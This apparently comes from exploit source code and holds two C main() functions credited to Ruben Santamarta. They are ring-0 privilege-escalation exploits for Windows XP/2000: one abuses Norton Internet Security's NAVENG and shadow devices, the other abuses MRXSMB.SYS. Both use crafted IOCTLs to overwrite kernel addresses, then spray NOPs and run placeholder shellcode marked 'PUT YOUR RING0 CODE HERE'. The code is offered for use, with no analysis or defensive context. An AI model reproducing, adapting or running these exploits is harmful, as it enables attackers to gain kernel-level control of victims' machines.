int main(int argc, char *argv[]) { DWORD *OutBuff,*InBuff,Ring0Addr,mmUserProbe; DWORD dwIOCTL,OutSize,InSize,junk,cb,devNum,i,ShellAddr,hValue; HANDLE hDevice; PENUMDEVICES pEnumDeviceDrivers; PGETDEVNAME pGetDeviceDriverBaseName; LPVOID arrMods[200],addEx; DWORD BaseNt=0,BaseAuxNt; BOOL InXP; CHAR baseName[MAX_PATH]; unsigned char Ring0ShellCode[]="\xcc"; //"PUT YOUR RING0 CODE HERE " system("cls"); printf("\n################################\n"); printf("## Norton I.S ##\n"); printf("## Ring0 Exploit ##\n"); printf("################################\n"); printf("\nRuben Santamarta\nwww.reversemode.com\n\n"); if(argc<2) { printf("\nusage> exploit.exe <XP> or <2K>\n"); exit(1); } pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"), "EnumDeviceDrivers"); pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"), "GetDeviceDriverBaseNameA"); pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb); devNum=cb/sizeof(LPVOID); printf("\n[!] Searching Ntoskrnl.exe Base Address..."); for(i=0; i<=devNum; i++) { pGetDeviceDriverBaseName(arrMods[i],baseName,MAX_PATH); if((strncmp(baseName,"ntoskr",6)==0)) { printf("[%x] Found!\n",arrMods[i]); BaseNt = (DWORD)arrMods[i]; BaseAuxNt=BaseNt; } } if (!BaseNt) { printf("!!? ntoskrnl.exe base address not found\nexiting\n\n"); exit(0); } if(strncmp(argv[1],"XP",2)==0) InXP = TRUE; else InXP = FALSE; ////////////////////////////////////// ////// STAGE 1 ////////////////////////////////////// if(InXP) BaseNt += WXP_USERPROBE; else BaseNt += W2K_USERPROBE; ////////////////////// ///// CASE 'DosDevice' ////////////////////// hDevice = CreateFile("\\\\.\\NAVENG", 0, 0, NULL, 3, 0, 0); if (hDevice == INVALID_HANDLE_VALUE) ShowError(); printf("\n\n** Initializing Exploit\t[Stage 1]\n\n"); printf("\nINFORMATION \n"); printf("-----------------------------------------------------\n"); printf("[!] NAVENG Device Handle [%x]\n",hDevice); ////////////////////// ///// BUFFERS ////////////////////// OutSize = 4; OutBuff = malloc(sizeof(DWORD)); ////////////////////// ///// IOCTL ////////////////////// dwIOCTL = 0x222ADB; DeviceIoControl(hDevice, dwIOCTL, (LPVOID)0,0, (LPVOID)OutBuff,OutSize, &junk, NULL); printf("[!] mmUserProbeAddress current value:\t[0x7FFF0000]\n"); printf("[!] Overwriting mmUserProbeAddress at:\t[0x%x] \n",BaseNt); printf("[!] mmUserProbeAddress current value:\t[0x%x]\n",OutBuff[0]); printf("[*] ProbeForWrite now checking for values greater than 0x%x\n\n",OutBuff[0]); DeviceIoControl(hDevice, dwIOCTL, (LPVOID)0,0, (LPVOID)BaseNt,OutSize, &junk, NULL); mmUserProbe=OutBuff[0]; free((LPVOID)OutBuff); CloseHandle(hDevice); ////////////////////// ///// STAGE 2 ////////////////////// BaseNt = BaseAuxNt; ///////////////////////// printf("\n\n** Initializing Exploit\t[Stage 2]\n\n"); addEx=(LPVOID)CalcJump(BaseNt,InXP,&hValue,&ShellAddr); OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); if(!OutBuff) ShowError(); InBuff=OutBuff; printf("[!] Checking Shadow Device..."); hDevice = CreateFile("\\\\.\\shadow", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) ShowError(); printf("[OK]\n"); printf("[!] Exploiting Shadow Device...\n"); while(OutBuff[3]< hValue) { DeviceIoControl(hDevice, // "\\.\shadow" 0x141043, // Privileged IOCTL InBuff, 2, // InBuffer, InBufferSize OutBuff, 0x18,// OutBuffer,OutBufferSize &junk, // bytes returned (LPOVERLAPPED) NULL); printf("\r\t[->]VALUES: (%x)",OutBuff[3]); } if(InXP) Ring0Addr = BaseNt + WXP_EXCEPTION; else Ring0Addr = BaseNt + W2K_EXCEPTION; printf("\n[!] Overwriting ExRaiseAccessViolation at [0x%x]...",Ring0Addr+0xC); DeviceIoControl(hDevice, // "\\.\shadow" 0x141043, // Privileged IOCTL InBuff, 2, // InBuffer, InBufferSize (LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x &junk, // bytes returned (LPOVERLAPPED) NULL); printf("[OK]"); printf("\n\n\t\t[!] Initializing Countdown,last chance to abort."); for(i=1; i<0x3C00; i++) OutBuff[i]=0x90909090; // paged out memcpy((LPVOID)ShellAddr,(LPVOID)Ring0ShellCode,sizeof(Ring0ShellCode)); for(i=10; i>=1; i--) { printf("\r -[ %d ]- ",i); if(i==1) printf("\n\n[*] Executing ShellCode"); Sleep(1000); } DeviceIoControl(hDevice, 0x141043, InBuff, 2, (LPVOID)mmUserProbe+0x1000, 0x18, &junk, (LPOVERLAPPED) NULL); CloseHandle(hDevice); printf("\n\n[*] Exploit terminated\n\n"); ///////////////////// ///// CLeanUp ///////////////////// free(OutBuff); return 0; }
int main(int argc, char *argv[]) { PENUMDEVICES pEnumDeviceDrivers; PGETDEVNAME pGetDeviceDriverBaseName; LPVOID arrMods[200],addEx; DWORD cb,i,devNum,dwTemp,hValue,Ring0Addr,junk,ShellAddr,BaseMRX=0; DWORD *OutBuff,*InBuff; HANDLE hDevice; BOOL InXP; CHAR baseName[255]; CONST CHAR Ring0ShellCode[]="\xCC"; //"PUT YOUR RING0 CODE HERE :)" if(argc<2) { printf("\nMRXSMB.SYS RING0 Exploit\n"); printf("--- Ruben Santamarta ---\n"); printf("Tested on XPSP2 & W2KSP4\n"); printf("\nusage> exploit.exe <XP> or <2K>\n"); exit(1); } if(strncmp(argv[1],"XP",2)==0) InXP=TRUE; else InXP=FALSE; pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"), "EnumDeviceDrivers"); pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"), "GetDeviceDriverBaseNameA"); pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb); devNum=cb/sizeof(LPVOID); printf("\nSearching Mrxsmb.sys Base Address..."); for(i=1;i<=devNum;i++) { pGetDeviceDriverBaseName(arrMods[i],baseName,254); if((strncmp(baseName,"mrxsmb",6)==0)) { printf("[%x] Found!\n",arrMods[i]); BaseMRX=(DWORD)arrMods[i]; } } if(!BaseMRX) { printf("Not Found\nExiting\n\n"); exit(1); } addEx=(LPVOID)CalcJump(BaseMRX,InXP,&hValue,&ShellAddr); OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); if(!OutBuff) ShowError(); printf("F000h bytes allocated at \t\t [0x%p]\n",addEx); printf("Value needed \t\t\t [0x%p]\n",hValue+4); InBuff=OutBuff; printf("Checking Shadow Device..."); hDevice = CreateFile("\\\\.\\shadow", FILE_EXECUTE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) ShowError(); printf("[OK]\n"); printf("Querying Device...\n"); while(OutBuff[3]< hValue) { DeviceIoControl(hDevice, // "\\.\shadow" MAGIC_IOCTL, // Privileged IOCTL InBuff, 2, // InBuffer, InBufferSize OutBuff, 0x18,// OutBuffer,OutBufferSize &junk, // bytes returned (LPOVERLAPPED) NULL); printf("\r\t[->]VALUES: (%x)",OutBuff[3]); } if(InXP) Ring0Addr=BaseMRX+XPSP2; else Ring0Addr=BaseMRX+W2KSP4; printf("Overwritting Driver Call at[%x]...",Ring0Addr); DeviceIoControl(hDevice, // "\\.\shadow" MAGIC_IOCTL, // Privileged IOCTL InBuff, 2, // InBuffer, InBufferSize (LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x &junk, // bytes returned (LPOVERLAPPED) NULL); printf("[OK]\n"); for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090; memcpy((LPVOID*)ShellAddr,(LPVOID*)Ring0ShellCode,sizeof(Ring0ShellCode)); printf("Sending IOCTL to execute the ShellCode\n"); DeviceIoControl(hDevice, // "\\.\shadow" MAGIC_IOCTL, // Privileged IOCTL InBuff, 2, // InBuffer, InBufferSize OutBuff, 0x18,// OutBuffer,OutBufferSize &junk, // bytes returned (LPOVERLAPPED) NULL); dwTemp=CloseHandle(hDevice); if(!dwTemp) ShowError(); dwTemp=VirtualFree(OutBuff,0xf000,MEM_DECOMMIT); if(!dwTemp) ShowError(); return(1); }